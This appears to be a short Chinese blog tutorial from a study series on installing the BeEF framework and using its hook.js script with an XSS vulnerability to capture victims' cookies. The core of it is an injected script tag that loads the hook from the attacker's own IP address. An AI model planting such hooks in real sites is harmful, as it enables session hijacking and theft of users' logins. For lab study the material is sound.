day07beef-xss之根据beef-xss获取cookies

guowu6662024-05-11 20:52

1.安装

bash 复制代码 
apt-get update
apt-get install beef-xss

若报错运行不了尝试

apt remove ruby

apt remove beef-xss

apt-get install ruby

apt-get install ruby-dev libpcap-dev

gem install eventmachine

apt-get install beef-xss

2.运行

bash 复制代码 
beef-xss

运行成功会自动弹出浏览框。

bash 复制代码 
攻击代码:beef-xsx所在电脑的ip:3000/hook.js

<script src="http://192.168.190.141:3000/hook.js"></script>

结合xss漏洞可以获取cookies ,在beef-xss查看结果。

发送指令获取cookies

相关推荐
帅帅哥的兜兜1 分钟前
猪齿鱼:实现table分页勾选
前端·javascript·vue.js
wicb91wJ62 分钟前
手写一个Promise,彻底掌握异步原理
开发语言·前端·javascript
上海云盾-小余5 分钟前
Web 业务常见 SQL 注入攻击原理详解及 WAF 防护部署实战教程
前端·数据库·sql
zs宝来了6 分钟前
Next.js SSR/SSG:路由与渲染模式深度解析
前端·javascript·框架
ZC跨境爬虫8 分钟前
UI前端美化技能提升日志day5:从布局优化到CSS继承原理深度解析
前端·css·ui·html·状态模式
易生一世11 分钟前
Kiro CLI的context详解
前端
huangql52015 分钟前
CSS布局(六):Grid —— 像围棋一样布局
前端·css
谢尔登17 分钟前
【Next】客户端组件和服务端组件
前端·javascript·react.js·架构
Mintopia18 分钟前
合合信息蜜蜂 AI 最新资讯(2026.4.22 官方发布)
前端
Mintopia18 分钟前
如何用第一性原理提升问题解决能力
前端
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026年4月AI大事件深度解读:大模型竞争进入“深水区“04近期有什么ai的新消息,新动态? 2026.4月052026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07codex app每次打开重连5次Reconnecting问题解决08CC-Switch & Claude 基于 Linux 服务器安装使用指南09从限购到畅通:GLM-5.1 Coding Plan接入攻略102026年AI前瞻:量子AI、具身智能与科学发现的新纪元